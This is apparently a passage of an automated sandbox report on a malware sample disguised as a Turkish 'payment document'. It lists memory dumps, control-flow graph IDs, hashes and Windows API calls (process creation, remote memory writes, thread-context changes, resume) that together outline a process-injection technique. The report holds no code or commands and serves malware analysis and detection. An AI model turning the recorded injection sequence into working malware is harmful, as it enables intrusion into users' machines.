                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 576c393ce210b02dac60ceef880dab8448aa082e11a44170f50e2f89447824e1
                • Instruction ID: 92aee8556a8d3a59f8a8f5a422fd66ad3e0222aaec3b3f58fdc9fceffd0b9249
                • Opcode Fuzzy Hash: 576c393ce210b02dac60ceef880dab8448aa082e11a44170f50e2f89447824e1
                • Instruction Fuzzy Hash: 4702CFB4E11228CFDB64CFA9D880B9DBBB1BF49304F1481AAE419B7350DB349985CF95

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 537 a6ec64f-a6ec712 539 a6ec7ca-a6ec7df 537->539 540 a6ec718-a6ec753 537->540 541 a6ec88f-a6ec893 539->541 542 a6ec7e5-a6ec82b 539->542 557 a6ec78b-a6ec79c 540->557 558 a6ec755-a6ec75d 540->558 543 a6ec8dd-a6ec92e 541->543 544 a6ec895-a6ec8d7 541->544 560 a6ec82d-a6ec835 542->560 561 a6ec869-a6ec874 542->561 547 a6ec9e6-a6ec9f8 543->547 548 a6ec934-a6ec96f 543->548 544->543 550 a6ec9fa-a6eca12 547->550 551 a6eca15-a6eca27 547->551 578 a6ec9a7-a6ec9b8 548->578 579 a6ec971-a6ec979 548->579 550->551 554 a6eca29-a6eca41 551->554 555 a6eca44-a6ecaba CreateProcessW 551->555 554->555 562 a6ecabc-a6ecac2 555->562 563 a6ecac3-a6ecb04 555->563 566 a6ec7a2-a6ec7c2 557->566 564 a6ec75f-a6ec769 558->564 565 a6ec780-a6ec789 558->565 568 a6ec858-a6ec867 560->568 569 a6ec837-a6ec841 560->569 580 a6ec87a-a6ec889 561->580 562->563 583 a6ecb1b-a6ecb32 563->583 584 a6ecb06-a6ecb15 563->584 571 a6ec76d-a6ec77c 564->571 572 a6ec76b 564->572 565->566 566->539 568->580 575 a6ec845-a6ec854 569->575 576 a6ec843 569->576 571->571 581 a6ec77e 571->581 572->571 575->575 585 a6ec856 575->585 576->575 588 a6ec9be-a6ec9de 578->588 586 a6ec99c-a6ec9a5 579->586 587 a6ec97b-a6ec985 579->587 580->541 581->565 595 a6ecb4b-a6ecb5b 583->595 596 a6ecb34-a6ecb40 583->596 584->583 585->568 586->588 590 a6ec989-a6ec998 587->590 591 a6ec987 587->591 588->547 590->590 592 a6ec99a 590->592 591->590 592->586 597 a6ecb5d-a6ecb6c 595->597 598 a6ecb72-a6ecbb5 595->598 596->595 597->598 603 a6ecbb7-a6ecbbb 598->603 604 a6ecbc5-a6ecbc9 598->604 603->604 605 a6ecbbd-a6ecbc0 call a6e1920 603->605 606 a6ecbcb-a6ecbcf 604->606 607 a6ecbd9-a6ecbdd 604->607 605->604 606->607 609 a6ecbd1-a6ecbd4 call a6e1920 606->609 610 a6ecbdf-a6ecbe3 607->610 611 a6ecbed 607->611 609->607 610->611 613 a6ecbe5-a6ecbe8 call a6e1920 610->613 615 a6ecbee 611->615 613->611 615->615
                APIs
                • CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 0A6ECAA7
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 736834b2978011cf952e4110e94e11ba8de29c40ae51a2f8d6e690806afaef31
                • Instruction ID: 70957650ec0ce2fafbe7379b030999a95a336042dc0dbd57344c85df3f9aa9bf
                • Opcode Fuzzy Hash: 736834b2978011cf952e4110e94e11ba8de29c40ae51a2f8d6e690806afaef31
                • Instruction Fuzzy Hash: 00F1CEB4E11228CFDB64CFA9C884B9DBBB1BF49304F1481AAE419B7350DB349985CF95

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 616 4ff87f8-4ff88ed 632 4ff88ef-4ff8915 616->632 633 4ff895d 616->633 635 4ff891c-4ff8958 632->635 636 4ff8917 632->636 634 4ff8960 633->634 637 4ff8967-4ff8983 634->637 635->633 636->635 639 4ff898c-4ff898d 637->639 640 4ff8985 637->640 641 4ff8cec-4ff8d1b 639->641 642 4ff8992-4ff8996 639->642 640->634 640->641 640->642 643 4ff89bf-4ff89cb 640->643 644 4ff8c3e-4ff8c50 640->644 645 4ff8bfd-4ff8c0f 640->645 646 4ff8a1d-4ff8a29 640->646 647 4ff8a9b-4ff8ab2 640->647 648 4ff8cb8-4ff8ccd 640->648 649 4ff8b98-4ff8ba1 640->649 650 4ff8ab7-4ff8ac9 640->650 651 4ff8c55-4ff8c61 640->651 652 4ff8c14-4ff8c39 640->652 653 4ff89f3-4ff89ff 640->653 654 4ff8cd2-4ff8ce7 640->654 655 4ff8b31-4ff8b43 640->655 656 4ff8a51-4ff8a66 640->656 657 4ff8ace-4ff8ae6 640->657 658 4ff8bcd-4ff8bd1 640->658 659 4ff8a6b-4ff8a6f 640->659 660 4ff8b48-4ff8b5f 640->660 661 4ff8ca6-4ff8cb3 640->661 662 4ff8b04-4ff8b10 640->662 663 4ff8b64-4ff8b70 640->663 680 4ff89a9-4ff89b0 642->680 681 4ff8998-4ff89a7 642->681 684 4ff89cd 643->684 685 4ff89d2-4ff89ee 643->685 644->637 645->637 668 4ff8a2b 646->668 669 4ff8a30-4ff8a4c 646->669 647->637 648->637 670 4ff8bb4-4ff8bbb 649->670 671 4ff8ba3-4ff8bb2 649->671 650->637 676 4ff8c68-4ff8c7e 651->676 677 4ff8c63 651->677 652->637 664 4ff8a06-4ff8a18 653->664 665 4ff8a01 653->665 654->637 655->637 656->637 678 4ff8aed-4ff8aff 657->678 679 4ff8ae8 657->679 672 4ff8be4-4ff8beb 658->672 673 4ff8bd3-4ff8be2 658->673 674 4ff8a82-4ff8a89 659->674 675 4ff8a71-4ff8a80 659->675 660->637 661->637 682 4ff8b17-4ff8b2c 662->682 683 4ff8b12 662->683 666 4ff8b77-4ff8b93 663->666 667 4ff8b72 663->667 664->637 665->664 666->637 667->666 668->669 669->637 687 4ff8bc2-4ff8bc8 670->687 671->687 689 4ff8bf2-4ff8bf8 672->689 673->689 691 4ff8a90-4ff8a96 674->691 675->691 700 4ff8c85-4ff8ca1 676->700 701 4ff8c80 676->701 677->676 678->637 679->678 688 4ff89b7-4ff89bd 680->688 681->688 682->637 683->682 684->685 685->637 687->637 688->637 689->637 691->637 700->637 701->700
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: n5_B
                • API String ID: 0-2112625008
                • Opcode ID: 19a4d4466ffa5d02f079426f80543b5fc6f9167aa0d5eeaabfa1fd752d802356
                • Instruction ID: 9d20fd120baa1b794fa761603d2572d8430e2d9e6b74d075e9cd405088bb890c
                • Opcode Fuzzy Hash: 19a4d4466ffa5d02f079426f80543b5fc6f9167aa0d5eeaabfa1fd752d802356
                • Instruction Fuzzy Hash: C9F1A271E04206DFCB14DF99C8909AEFBB2FF85380F159559CA02AB225D734A943CF91
                APIs
                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0A6ED778
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: MemoryVirtualWrite
                • String ID:
                • API String ID: 3527976591-0
                • Opcode ID: c5f199e95c107c9485745fb657a0e81c920dc42ae7adad4de90eb5f5a3b37bc1
                • Instruction ID: 493bfc475cfba1138ae5fcdcb64bbd81e68402243dedfef1dc95a631cf40a7c3
                • Opcode Fuzzy Hash: c5f199e95c107c9485745fb657a0e81c920dc42ae7adad4de90eb5f5a3b37bc1
                • Instruction Fuzzy Hash: 0341ABB5D012589FCF00CFA9D984AEEFBF1FB49314F24902AE818B7250D738AA45CB54
                APIs
                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0A6ED778
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: MemoryVirtualWrite
                • String ID:
                • API String ID: 3527976591-0
                • Opcode ID: d40effd160bd678462f499cb09178b8bcd7219ad14905ec44a58783ffd2c535b
                • Instruction ID: 16a6e077c4d3a3b96fae5601803cc499648ce854762bac71ad49d1439d336f2a
                • Opcode Fuzzy Hash: d40effd160bd678462f499cb09178b8bcd7219ad14905ec44a58783ffd2c535b
                • Instruction Fuzzy Hash: B4419AB5D012589FCF00CFA9D984AEEFBF1BB49310F24942AE819B7250D739AA45CF54
                APIs
                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0A6ED382
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: MemoryReadVirtual
                • String ID:
                • API String ID: 2834387570-0
                • Opcode ID: d9a7bf83fc3f1f2504070bfd36489549dc33d59064e516c9d348f6eb4345d75b
                • Instruction ID: 2e4e9eae2d4faa7dd920a0395dc1b277ddde488533328debd7a842c1238730b2
                • Opcode Fuzzy Hash: d9a7bf83fc3f1f2504070bfd36489549dc33d59064e516c9d348f6eb4345d75b
                • Instruction Fuzzy Hash: 444198B5D05258DFCF10CFAAD880AEEFBB1BB49310F14942AE819B7200D739A945CF64
                APIs
                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0A6ED382
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: MemoryReadVirtual
                • String ID:
                • API String ID: 2834387570-0
                • Opcode ID: ed4b04b977f4208f269cbb61a54f5efca3a42fe57308a44e15ce16465457b29c
                • Instruction ID: 8a0825d3fadfda179f0728af54c229660952d10545aa0c106f2b8163aefe3bf4
                • Opcode Fuzzy Hash: ed4b04b977f4208f269cbb61a54f5efca3a42fe57308a44e15ce16465457b29c
                • Instruction Fuzzy Hash: CC41A9B4D00258DFCF10CFAAD880AEEFBB1BB49310F14942AE815B7200C739A945CF64
                APIs
                • NtSetContextThread.NTDLL(?,?), ref: 0A6ED8AF
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: ContextThread
                • String ID:
                • API String ID: 1591575202-0
                • Opcode ID: bc0d61312f6a717853d508e8945521b7fdf6a6203cd66102d954e9f2e3482bbf
                • Instruction ID: 8819e1ad742a2da8ac4d039f38e25983efb09bf2d17d6cbc889be78126ca51c5
                • Opcode Fuzzy Hash: bc0d61312f6a717853d508e8945521b7fdf6a6203cd66102d954e9f2e3482bbf
                • Instruction Fuzzy Hash: A941BBB4D01258DFDB10CFA9D884AEEBBF1BF49314F24802AE419B7240D738A945CF54
                APIs
                • NtSetContextThread.NTDLL(?,?), ref: 0A6ED8AF
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: ContextThread
                • String ID:
                • API String ID: 1591575202-0
                • Opcode ID: d4bfd680eb47a5301b43d8850f131679fc33739800a5bda108fbf424e191271e
                • Instruction ID: 09429f0934042451226a03afee6e32d526af4290363dd28f30b2a7350c54161f
                • Opcode Fuzzy Hash: d4bfd680eb47a5301b43d8850f131679fc33739800a5bda108fbf424e191271e
                • Instruction Fuzzy Hash: B0319AB4D01258DFDB14CFAAD984AEEBBF1BF49314F14802AE419B7240D738A945CF54
                APIs
                • NtResumeThread.NTDLL(?,?), ref: 0A6ED511
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: 12d6a9449f081025385f4d3be0d107abe748f4b8da0723d37e818735ae0009a8
                • Instruction ID: 391ef7a48dcfff694440094f1a5e57d409638800520513b4fffb58091ec3ad8a
                • Opcode Fuzzy Hash: 12d6a9449f081025385f4d3be0d107abe748f4b8da0723d37e818735ae0009a8
                • Instruction Fuzzy Hash: 1A31A8B4D01218DFCB20CFA9D980AAEBBF1BB59314F24942AE815B7300C739A946CF54
                APIs
                • NtResumeThread.NTDLL(?,?), ref: 0A6ED511
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: 9c871b04a3cd91f9357209448bcb0065a85de004ba31fb37275e4f7e06e742b4
                • Instruction ID: ea345ae7f086b341de25f36c822b1e83d5d4bd17758dfcc8fb706840b348bc6f
                • Opcode Fuzzy Hash: 9c871b04a3cd91f9357209448bcb0065a85de004ba31fb37275e4f7e06e742b4
                • Instruction Fuzzy Hash: A631A7B4D01218DFCB10CFA9D980AAEFBF5FB49314F10942AE815B7200C739A946CFA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: ;kyw
                • API String ID: 0-1919984221
                • Opcode ID: 884fcf08b55ae30b79c816edb43be2078d4a5cf50475c83e6705a2bec821eaa9
                • Instruction ID: b6019ece614e27ac57ad1d4f4cb958b79860915582267cae18f6528e94026457
                • Opcode Fuzzy Hash: 884fcf08b55ae30b79c816edb43be2078d4a5cf50475c83e6705a2bec821eaa9
                • Instruction Fuzzy Hash: 65D190B8D0420ADFCB04CFA5C4818AEFBF2FF8A305B559555C41AEB215D7359A82CF94
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: ;kyw
                • API String ID: 0-1919984221
                • Opcode ID: f16e5e6a4d161a36d3bc9637062d30d3368382563d2d2adc423b08259e56feb7
                • Instruction ID: 49d21b9c9ca56b41307d90a0bb324ef22d65dc92556b2fdd25ae16672d11f907
                • Opcode Fuzzy Hash: f16e5e6a4d161a36d3bc9637062d30d3368382563d2d2adc423b08259e56feb7
                • Instruction Fuzzy Hash: 2FD13DB8D0020ADFCF04CF95C4818AEFBF2FF8A345B559559D41AAB214D735AA82CF94
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: n5_B
                • API String ID: 0-2112625008
                • Opcode ID: ac866a09cd14ca4f91afc802d12b36ebc05deddc392baa2053e00640d9f4a99b
                • Instruction ID: da1f6015fb8b71ef905bc83754dcfa9ff7f78502bf56a82c450a10a05de4e504
                • Opcode Fuzzy Hash: ac866a09cd14ca4f91afc802d12b36ebc05deddc392baa2053e00640d9f4a99b
                • Instruction Fuzzy Hash: 48D14B71E0120ADFCB04DF95C9808AEFBB2FF88740F14D559D516AB225D734AA42CF95
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: p
                • API String ID: 0-2181537457
                • Opcode ID: 608ca9e4c3e467c589b74a28dd46ecaeed49cd2e15c2bd29e576175e97404972
                • Instruction ID: a336a44769632bc1b026cbd32256cec01a6d05e5a6464126379b27caf03780fe
                • Opcode Fuzzy Hash: 608ca9e4c3e467c589b74a28dd46ecaeed49cd2e15c2bd29e576175e97404972
                • Instruction Fuzzy Hash: 87619FB1914559DFD714CF99D840ABAB7BAFFCA306F1080ABD80AAA162DB305553CF60
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: fg
                • API String ID: 0-1332240855
                • Opcode ID: 23df6d519b251680f45f7d9ba27b0b4ce029318ca081f1a5c6ca4571cd9251d2
                • Instruction ID: f6635a52c16d334683d2b8f1fc44af9abaed47a33dbb02ad85fefcf558d4718f
                • Opcode Fuzzy Hash: 23df6d519b251680f45f7d9ba27b0b4ce029318ca081f1a5c6ca4571cd9251d2
                • Instruction Fuzzy Hash: DD6114B8E05219DFCF04CFA5D5846AEFBB2FF8A304F109929D426AB250DB746945CF50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: <
                • API String ID: 0-4251816714
                • Opcode ID: 4786502500b4df5eb5dd41db42cc9331bb18b6e32ed28ea6b4a429f31a76bece
                • Instruction ID: 2e3836a7aa1b3b9c77e9c47eac55e3213b094bdff1be1381852eac19292d59ca
                • Opcode Fuzzy Hash: 4786502500b4df5eb5dd41db42cc9331bb18b6e32ed28ea6b4a429f31a76bece
                • Instruction Fuzzy Hash: 79618875E00618CFDB58CFAAC9446DDBBF2BF89300F14C1AAD508AB265EB345A85CF50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: <
                • API String ID: 0-4251816714
                • Opcode ID: 1cc28ec282a414178d4d832ebdbc1b59116378471ab97ef9bddb15b3a2f0835f
                • Instruction ID: f36e6796f20e2fffe09a40dfa3f45601cbb4bec0ca728464d27141de506338e1
                • Opcode Fuzzy Hash: 1cc28ec282a414178d4d832ebdbc1b59116378471ab97ef9bddb15b3a2f0835f
                • Instruction Fuzzy Hash: 7A619574E01658CFDB58CFAAC9446DDBBF2AF89301F14C0AAD409AB325DB345A81CF00
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: b77d39a067c3693ec3072ca48de4a31db6d4e0af2b8101846559fbc747471ad3
                • Instruction ID: ca09819e032215ab7f4164239e973173e12e04b2bcaf6d73bb42a90f3e2ecbb1
                • Opcode Fuzzy Hash: b77d39a067c3693ec3072ca48de4a31db6d4e0af2b8101846559fbc747471ad3
                • Instruction Fuzzy Hash: E1211B75E046188FEB58CF6BD84069EFBF7AFC9200F04C1BAC408AA224EB3019468F51
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 35bdd90912369ce15287dcc3c4dac0571a060a8d2cbd54b0ddd4d0667cd7847d
                • Instruction ID: 11b10c8ad150e6b7ae50f2f183304ab25f98ec1ba586e2727565fd6109a70640
                • Opcode Fuzzy Hash: 35bdd90912369ce15287dcc3c4dac0571a060a8d2cbd54b0ddd4d0667cd7847d
                • Instruction Fuzzy Hash: 40B11374E16218DFCF28CFA5D8846DDFBB6FF89300F14952AD409AB258E73499428F24
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6fef8403d5839bb42bde23482889341f1a41fa16f9b3a676b09006c7b0ed8122
                • Instruction ID: 6f5537e92a2eb41637aed766698f699630660e8329423be7f7920a945fd5a46d
                • Opcode Fuzzy Hash: 6fef8403d5839bb42bde23482889341f1a41fa16f9b3a676b09006c7b0ed8122
                • Instruction Fuzzy Hash: 34C10274E052189FCB64CFA8D8946DEBBF2FF49300F2081AAD519AB355DB349A41CF51
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b019b862b9dfccb687ae22ea249cc10f207e961152bdb47f529a1fc6f2dfa70b
                • Instruction ID: 62b8d0d7b7868f424118bad7e07fb38e6db50a2aa5ab623581605a157b57f13d
                • Opcode Fuzzy Hash: b019b862b9dfccb687ae22ea249cc10f207e961152bdb47f529a1fc6f2dfa70b
                • Instruction Fuzzy Hash: DF510A71E0420ACFCB08DF99D8405AEFBF2EF89301F14D46AD519A7265E7349A42CF95
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8797a5d15e52c566abdaca144908a46b7a4236971df92fe6e7cf55efeb5b36a3
                • Instruction ID: 3bb8541dc832eca14d8302696472ffc4ad77cd86d9fae095e0d4603a63ae9016
                • Opcode Fuzzy Hash: 8797a5d15e52c566abdaca144908a46b7a4236971df92fe6e7cf55efeb5b36a3
                • Instruction Fuzzy Hash: 96510C71E042098FDB08DFEAD9405AEFBF2EF89300F14D46AD519A7265E7349A428F94
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 54c65580fc5c59077deba92ef9d9a206cbf8919fae06ef8ae13baf4af71fca22
                • Instruction ID: c05e121f8f152d465c0c02b44b2f0c64fabfcaf3cccbe752fb002ba6d0346e04
                • Opcode Fuzzy Hash: 54c65580fc5c59077deba92ef9d9a206cbf8919fae06ef8ae13baf4af71fca22
                • Instruction Fuzzy Hash: EB312975E01658CFDB18CFAAD9446DEBBB3AFC9300F14C0AAD409AB264DB345956CF40
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dd283b9ee4c61058f9fb282a63d2e2bcb9092585c8c87095e90b5fff624dbaa6
                • Instruction ID: 5a0a7e10b5d1d1f2dbbfd35e1c8a6e0e4df753579e9fc493ace7b710bef0ae56
                • Opcode Fuzzy Hash: dd283b9ee4c61058f9fb282a63d2e2bcb9092585c8c87095e90b5fff624dbaa6
                • Instruction Fuzzy Hash: AE31C971E006188BDB18CF9AD9447DEFBF7AFC8300F14C16AD509AA264DB741A55CF80

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 704 28e17ff-28e1804 705 28e1806-28e1812 704->705 706 28e1813-28e18ef VirtualProtect 704->706 705->706 708 28e18f8-28e1934 706->708 709 28e18f1-28e18f7 706->709 709->708
                APIs
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 028E18DF
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 0b93d8b9de9d09eabc2fff5f9096c37c4b486399120b6b06fe949979e0d76de7
                • Instruction ID: da09f3ac9fbb6209a8d1ea8529ac0e6d36ef55a16f1d430c1ee6d5c3405cff14
                • Opcode Fuzzy Hash: 0b93d8b9de9d09eabc2fff5f9096c37c4b486399120b6b06fe949979e0d76de7
                • Instruction Fuzzy Hash: 2241EFB8D042989FCB10CFA9D584AEEFFF0BF1A310F14949AE894B7211C735A945CB64
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A6ED632
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 6ce01ac9e52865da8e452518bc61a8498354e4b0424cc88f72aeb532f1469c88
                • Instruction ID: 854c69af850f9098fb8122ce14c93deed902a0e963490b64b532dfaba0d6fd42
                • Opcode Fuzzy Hash: 6ce01ac9e52865da8e452518bc61a8498354e4b0424cc88f72aeb532f1469c88
                • Instruction Fuzzy Hash: 5E3197B8D01258DFCF10CFA9D980AEEFBB1BB59310F14942AE819B7210D735A942CF64
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A6ED632
                Memory Dump Source
                • Source File: 00000000.00000002.1692085461.000000000A6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_a6e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: add0588721cfa5cb421c619ad1947f05a29f9a97a212c50c2645b7e4105d63f9
                • Instruction ID: 6e527d75b87fae8bb69be628dcc0f9190040f4c106161e124392e0f421c38ddf
                • Opcode Fuzzy Hash: add0588721cfa5cb421c619ad1947f05a29f9a97a212c50c2645b7e4105d63f9
                • Instruction Fuzzy Hash: 073188B8D01258DFCF10CFA9D980A9EFBB5BB59310F10942AE815B7210D735A942CF54
                APIs
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 028EA09F
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: d3e81dd02e5cdbdea967e748230e6a221c5fef1705cb4275f329296c206965a3
                • Instruction ID: bafbe329c886e69044ec36c8f174f8b03e8f047a3c884748a210f08b3c25a830
                • Opcode Fuzzy Hash: d3e81dd02e5cdbdea967e748230e6a221c5fef1705cb4275f329296c206965a3
                • Instruction Fuzzy Hash: ED3186B9D002589FCF14CFA9D980AEEFBB5AB19310F24902AE815B7210D379A945CF64
                APIs
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 028E18DF
                Memory Dump Source
